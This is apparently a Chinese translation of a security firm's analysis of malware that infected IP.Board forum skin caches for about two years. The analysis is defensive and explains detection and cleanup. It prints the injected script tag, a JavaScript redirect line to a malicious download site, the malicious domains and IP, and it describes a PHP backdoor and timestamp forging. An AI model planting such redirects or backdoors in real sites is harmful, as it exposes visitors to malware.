IP.Board CMS惡意重定向分析
IP.Board CMS是一款著名的CMS系統,它允許用戶很容易地創建和管理在線社區。而最近Sucuri的研究員最近發現了一個針對IP.Board的重定向。經過分析,研究員們發現這種攻擊已經持續了2年之久了。
訪客被惡意重定向
重定向的癥狀非常典型,某些通過Google搜索的訪客會被重定向到一個惡意網站:filestore321 .com/download .php?id=hexnumber。每位訪客只會被重定向一次,重定向后再點擊不會被重定向。
我們捕捉HTTP流量后發現,網頁會從"hxxp://forum .hackedsite .com/index.php?ipbv=4458734cb50e112ba7dd3a154b22ecd9&g=js"加載腳本,腳本內容如下:
document.location='hxxp://filestore321 .com/download .php?id=8-digit-hex-number'
工作原理
那重定向是如何通過IP.Board運行的呢?由于我們對IP.Board還不是像WordPress那樣了解,因此查找來源廢了我們一番功夫。我們參考了2年前Peter Upfold的一篇文章。在這篇文章中,我們找到了重定向的工作原理,并且發現這個手法兩年前就出現了,而且沒有重大的改變。
大家并不需要訪問Peter Upfold的文章,我會在此解釋惡意軟件的工作原理和行為模式。
IP.Board使用的皮膚會同時儲存在數據庫和硬盤上(以文件形式儲存),如果有緩存的話就會存儲在./cache/skin_cache/cacheid_n下,n代表皮膚的編號。我們發現的受感染的皮膚文件就是./cache/skin_cache/cacheid_4下的skin_global.php文件。
高亮選中的這6行就是我們在這個120kb的皮膚文件找到的惡意代碼。
這三行經過加密的代碼中的變量名用到了$rsa、$pka、$pkb,讓人誤認為是什么安全密鑰。
我們還原了經過混淆的代碼,如下圖所示
首先,它會檢查訪客來源是否是來自搜索引擎或者是社交網絡鏈接并且確認不是什么爬蟲。如果這是訪客的首次訪問(沒有lang_idcookie),它就會在網頁中注入一段腳本:
- <script type='text/javascript' src='hxxp://hackedsite .com/index.php?ipbv=<some-hash>&g=js'>
接著,當受害者請求這段腳本時,它會檢查訪客是否加載過腳本,是不是第一次加載,然后將lang_id cookie設定為10小時,最后返回這段重定向的代碼。
有趣的是,這段代碼不會將瀏覽器的預讀請求算作是真實訪問,并且當請求有HTTP_X_MOZ頭時不會設定lang_id cookie。
這段代碼還儲存在IP.Board數據庫中的prefix_skin_cache表中。要將文件和數據庫中的惡意代碼都清除掉才算消除了隱患。
后門
除了重定向,這個惡意代碼中還有一個后門,攻擊者可以通過這個后門制造POST請求來執行PHP代碼。
每個皮膚文件都有如下的注釋:
/*--------------------------------------------------*/ /* FILE GENERATED BY INVISION POWER BOARD 3 */ /* CACHE FILE: Skin set id: 4 */ /* CACHE FILE: Generated: Fri, 19 Dec 2014 10:28:00 GMT */ /* DO NOT EDIT DIRECTLY - THE CHANGES WILL NOT BE */ /* WRITTEN TO THE DATABASE AUTOMATICALLY */ /*--------------------------------------------------*/
這段注釋表明文件生成的時間。我所發現的服務器中,所有的皮膚緩存文件都生成于2014年12月19日,除了受感染的skin_global.php是生成于2015年1月11日。但是skin_global.php的修改時間是2014年12月19日,跟其他文件一樣。
我認為攻擊者應該是IP.Board的標準界面注入了這些惡意代碼(可能是通過盜號或者是利用了某個漏洞入侵的)。攻擊者更新了皮膚緩存文件,但是為了防止網站管理員檢查最近修改的文件,攻擊者利用皮膚中的后門偽造了這些感染文件的修改時間。
域名
這場針對IP.Board的攻擊已經進行了起碼兩年了。主要的區別就是2015使用的域名是filestore321 . com,而2013年時使用的是url4short . info。
這兩個域名的IP都是66.199.231.59(Access Integrated Technologies, Inc., USA)。
這個IP地址上還有些類似的域名,所有的域名都被用作惡意活動。
filestore321 .com - Created on 2011-01-27 - Expires on 2016-01-27 - Updated on 2015-01-05 url4short .info. - Created on 2011-01-27 - Expires on 2016-01-27 - Updated on 2015-01-05 file2store.info - Created on 2010-02-17 - Expires on 2015-02-17 - Updated on 2014-01-03 filestore123.info - Created on 2011-01-07 - Expires on 2016-01-07 - Updated on 2014-10-10 myfilestore.com - Created on 2010-02-03 - Expires on 2016-02-03 - Updated on 2015-01-05 filestore72.info - Created on 2010-10-14 - Expires on 2015-10-14 - Updated on 2014-10-10
其中的某些網站會重定向到類似下面這個URL:
hxxp://oognyd96wcqbh6nmzdf0erj .ekabil .com/index .php?g=d3F3eGFnPXhnc2h6dGxzJnRpbWU9MTUwMjA0MTEyODIyNjQ1NTQ4MDcmc3JjPTc2JnN1cmw9dXJsNHNob3J0LmluZm8mc3BvcnQ9ODAma2V5PTJBOTZEMjlEJnN1cmk9L3ByaXZhY3kuaHRtbA==
參考來源:http://blog.sucuri.net/2015/02/analyzing-malicious-redirects-in-the-ip-board-cms.html
